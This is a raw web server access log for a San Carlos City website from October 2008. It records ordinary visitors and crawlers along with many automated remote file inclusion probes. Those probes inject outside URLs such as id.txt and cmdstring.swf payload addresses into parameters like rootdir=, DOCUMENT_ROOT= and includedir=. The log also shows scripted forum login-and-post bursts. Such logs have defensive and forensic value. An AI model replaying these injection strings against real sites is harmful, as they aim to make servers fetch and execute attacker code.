200.63.42.95 - - [30/Oct/2008:05:15:59 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41364 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:16:11 -0700] "GET /listings/listing/results.php?category_id=711 HTTP/1.1" 200 31209 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:05:16:17 -0700] "GET /logs/errors.php?error=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 764 "-" "libwww-perl/5.79" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:05:16:17 -0700] "GET /logs/access_081004.log/errors.php?error=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 769 "-" "libwww-perl/5.79" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:05:16:17 -0700] "GET /errors.php?error=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 759 "-" "libwww-perl/5.79" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:16:22 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11442 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:16:22 -0700] "GET /listings/listing/results.php?letter=b&category_id=739 HTTP/1.1" 200 25109 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:16:24 -0700] "GET /listings/listing/detail.php?id=14828 HTTP/1.1" 200 35945 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
123.214.171.33 - - [30/Oct/2008:05:16:26 -0700] "GET /logs/access_080916.log/classes/core/language.php?rootdir=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 784 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sancarloscity.org"
123.214.171.33 - - [30/Oct/2008:05:16:26 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 766 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sancarloscity.org"
123.214.171.33 - - [30/Oct/2008:05:16:28 -0700] "GET /classes/core/language.php?rootdir=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 761 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:16:28 -0700] "GET /listings/listing/results.php?category_id=698 HTTP/1.1" 200 33523 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:16:43 -0700] "GET /listings/listing/detail.php?id=14829 HTTP/1.1" 200 36940 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:05:16:46 -0700] "GET /listings/event/results.php?letter=v&month=200810&this_date=20081001 HTTP/1.0" 200 21044 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:17:00 -0700] "GET /listings/listing/results.php?category_id=744 HTTP/1.1" 200 28921 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:17:07 -0700] "GET /listings/listing/results.php?category_id=736 HTTP/1.1" 200 24382 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:17:18 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:17:19 -0700] "GET /listings/listing/results.php?letter=h&category_id=719 HTTP/1.1" 200 25082 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:17:25 -0700] "GET /robots.txt HTTP/1.1" 404 750 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "radio.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:17:26 -0700] "GET / HTTP/1.1" 200 5571 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "radio.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:05:17:26 -0700] "GET /logs/errors.php?error=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 764 "-" "libwww-perl/5.79" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:05:17:26 -0700] "GET /errors.php?error=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 759 "-" "libwww-perl/5.79" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:05:17:26 -0700] "GET /logs/access_081004.log/errors.php?error=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 769 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:17:27 -0700] "GET /listings/order_banner.php?type=50 HTTP/1.1" 200 14809 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:17:42 -0700] "GET /listings/listing/detail.php?id=14830 HTTP/1.1" 200 33422 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:17:46 -0700] "GET /listings/banner_reports.php?id=93 HTTP/1.1" 302 5 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:17:47 -0700] "GET /listings/advertise.php?listing HTTP/1.1" 200 23565 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:17:55 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Help HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:17:59 -0700] "GET /listings/listing/results.php?category_id=713 HTTP/1.1" 200 24396 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:17:59 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Login&CODE=00 HTTP/1.1" 200 9525 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:18:04 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Members HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:18:06 -0700] "GET /listings/listing/results.php?category_id=718 HTTP/1.1" 200 28945 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:18:08 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Post&CODE=02&f=9&t=147&qpid=1085 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:18:13 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Post&CODE=02&f=9&t=147&qpid=832 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
24.67.0.44 - - [30/Oct/2008:05:18:14 -0700] "GET /logs/access_080921.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://610times.com/bbs/info/id.txt?? HTTP/1.1" 404 777 "-" "libwww-perl/5.79" "www.sancarloscity.org"
24.67.0.44 - - [30/Oct/2008:05:18:14 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://610times.com/bbs/info/id.txt?? HTTP/1.1" 404 766 "-" "libwww-perl/5.79" "www.sancarloscity.org"
82.99.30.16 - - [30/Oct/2008:05:18:14 -0700] "GET /jodera2/search.php?sid=942e134f1d8ccf91bcdf36be23205dcc HTTP/1.0" 200 24425 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
24.67.0.44 - - [30/Oct/2008:05:18:14 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://610times.com/bbs/info/id.txt?? HTTP/1.1" 404 772 "-" "libwww-perl/5.79" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:18:18 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Post&CODE=02&f=9&t=147&qpid=872 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:18:22 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Print&client=choose&f=9&t=147 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:18:23 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:18:24 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=7088548c12fa89435203820bbb02132e HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=7088548c12fa89435203820bbb02132e" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:18:25 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=7088548c12fa89435203820bbb02132e" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:18:26 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Print&client=printer&f=9&t=147 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:18:26 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=7088548c12fa89435203820bbb02132e HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=7088548c12fa89435203820bbb02132e" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:18:33 -0700] "GET /listings/listing/results.php?category_id=719 HTTP/1.1" 200 24332 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:18:33 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Reg&CODE=00 HTTP/1.1" 200 9222 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:18:36 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=7088548c12fa89435203820bbb02132e" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:18:37 -0700] "GET /jodera2/viewtopic.php?p=29881 HTTP/1.0" 200 31516 "http://www.sancarloscity.org/viewtopic.php?p=29881#29881" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:18:38 -0700] "GET /listings/listing/results.php?category_id=738 HTTP/1.1" 200 24193 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:18:45 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Search HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:18:46 -0700] "GET /listings/listing/results.php?category_id=730 HTTP/1.1" 200 24370 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.30.161.235 - - [30/Oct/2008:05:18:55 -0700] "GET /picgallery/addfav.php?pid=363 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:19:01 -0700] "GET /listings/favorites.php HTTP/1.1" 200 7509 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:19:06 -0700] "GET /listings/index.php HTTP/1.1" 200 10806 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:19:13 -0700] "GET /listings/listing/results.php?category_id=712 HTTP/1.1" 200 45751 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:19:20 -0700] "GET /listings/article/ HTTP/1.1" 200 6238 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:19:28 -0700] "GET /listings/listing/results.php?category_id=749 HTTP/1.1" 200 33159 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
203.177.74.135 - - [30/Oct/2008:05:19:29 -0700] "GET /index.htm HTTP/1.1" 200 44270 "http://sancarloscity.org/aboutsancarlos.htm" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17" "sancarloscity.org"
72.30.161.235 - - [30/Oct/2008:05:19:36 -0700] "GET /picgallery/displayimage.php?pos=0 HTTP/1.0" 200 3992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:19:38 -0700] "GET /listings/event/ HTTP/1.1" 200 13893 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:05:19:42 -0700] "GET /forum2/index.php?showtopic=180&mode=threaded HTTP/1.0" 200 7875 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:05:19:49 -0700] "GET /jodera2/viewtopic.php?p=27268 HTTP/1.1" 200 69277 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:05:19:50 -0700] "GET /jodera2/viewtopic.php?p=27245 HTTP/1.1" 200 69243 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:05:19:52 -0700] "GET /jodera2/viewtopic.php?p=27274 HTTP/1.1" 200 41905 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:19:54 -0700] "GET /listings/listing/results.php?category_id=692 HTTP/1.1" 200 40191 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:05:19:54 -0700] "GET /jodera2/viewtopic.php?p=27237 HTTP/1.1" 200 69084 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
116.126.143.88 - - [30/Oct/2008:05:19:54 -0700] "GET /logs/access_081003.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 814 "-" "Mozilla/5.0" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:05:19:56 -0700] "GET /jodera2/viewtopic.php?p=27252 HTTP/1.1" 200 68976 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:20:01 -0700] "GET /listings/listing/results.php?category_id=743 HTTP/1.1" 200 45246 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
152.101.139.2 - - [30/Oct/2008:05:20:04 -0700] "GET /tools/send_reminders.php?includedir=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 760 "-" "Microsoft Pocket Internet Explorer/0.6" "www.sancarloscity.org"
152.101.139.2 - - [30/Oct/2008:05:20:05 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 766 "-" "Microsoft Pocket Internet Explorer/0.6" "www.sancarloscity.org"
219.166.58.237 - - [30/Oct/2008:05:20:07 -0700] "GET /content.php?seite=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 760 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.sancarloscity.org"
219.166.58.237 - - [30/Oct/2008:05:20:07 -0700] "GET /logs/content.php?seite=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 765 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:05:20:14 -0700] "GET /jodera2/posting.php?mode=reply&t=24061 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24061" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:05:20:14 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24061&sid=524ca915fd35229fa8e2110734c76787 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24061&sid=524ca915fd35229fa8e2110734c76787" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:05:20:16 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24061&sid=524ca915fd35229fa8e2110734c76787" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:05:20:16 -0700] "GET /jodera2/posting.php?mode=reply&t=24061&sid=524ca915fd35229fa8e2110734c76787 HTTP/1.0" 200 50314 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24061&sid=524ca915fd35229fa8e2110734c76787" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:05:20:24 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24061&sid=524ca915fd35229fa8e2110734c76787" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:05:20:25 -0700] "GET /jodera2/viewtopic.php?p=29882 HTTP/1.0" 200 80846 "http://www.sancarloscity.org/viewtopic.php?p=29882#29882" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:20:29 -0700] "GET /?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 200 44270 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:20:48 -0700] "GET /listings/listing/results.php?category_id=742 HTTP/1.1" 200 28734 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
24.67.0.44 - - [30/Oct/2008:05:20:50 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://610times.com/bbs/info/id.txt?? HTTP/1.1" 404 766 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:21:03 -0700] "GET /listings/listing/results.php?category_id=756 HTTP/1.1" 200 39013 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
195.210.57.83 - - [30/Oct/2008:05:21:19 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "kalooga/KaloogaBot (Kalooga; http://www.kalooga.com/info.html?page=crawler; crawler@kalooga.com)" "www.sancarloscity.org"
195.210.57.83 - - [30/Oct/2008:05:21:19 -0700] "GET /promo_misssancarlos.jpg HTTP/1.0" 200 3503 "-" "kalooga/KaloogaBot (Kalooga; http://www.kalooga.com/info.html?page=crawler; crawler@kalooga.com)" "sancarloscity.org"
195.210.57.83 - - [30/Oct/2008:05:21:21 -0700] "GET /placeoftheweek.jpg HTTP/1.0" 200 42499 "-" "kalooga/KaloogaBot (Kalooga; http://www.kalooga.com/info.html?page=crawler; crawler@kalooga.com)" "sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:21:22 -0700] "GET /listings/listing/results.php?category_id=753 HTTP/1.1" 200 24355 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:05:21:23 -0700] "GET /jodera2/posting.php?mode=reply&t=24062 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:05:21:24 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24062&sid=89e84292eede98c96467b749ab8407a6 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24062&sid=89e84292eede98c96467b749ab8407a6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:05:21:26 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24062&sid=89e84292eede98c96467b749ab8407a6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:05:21:26 -0700] "GET /jodera2/posting.php?mode=reply&t=24062&sid=89e84292eede98c96467b749ab8407a6 HTTP/1.0" 200 50603 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24062&sid=89e84292eede98c96467b749ab8407a6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
74.6.22.101 - - [30/Oct/2008:05:21:28 -0700] "GET /qphotogallery/thumbnails.php?album=lastup&cat=-24 HTTP/1.0" 200 13540 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:05:21:39 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24062&sid=89e84292eede98c96467b749ab8407a6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:05:21:41 -0700] "GET /jodera2/viewtopic.php?p=29883 HTTP/1.0" 200 81085 "http://www.sancarloscity.org/viewtopic.php?p=29883#29883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:21:48 -0700] "GET /robots.txt HTTP/1.1" 200 44 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:21:48 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
66.225.214.207 - - [30/Oct/2008:05:21:59 -0700] "GET /logs/access_080927.log//modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/idih.txt%0D? HTTP/1.1" 404 789 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
66.225.214.207 - - [30/Oct/2008:05:21:59 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/idih.txt%0D? HTTP/1.1" 404 771 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
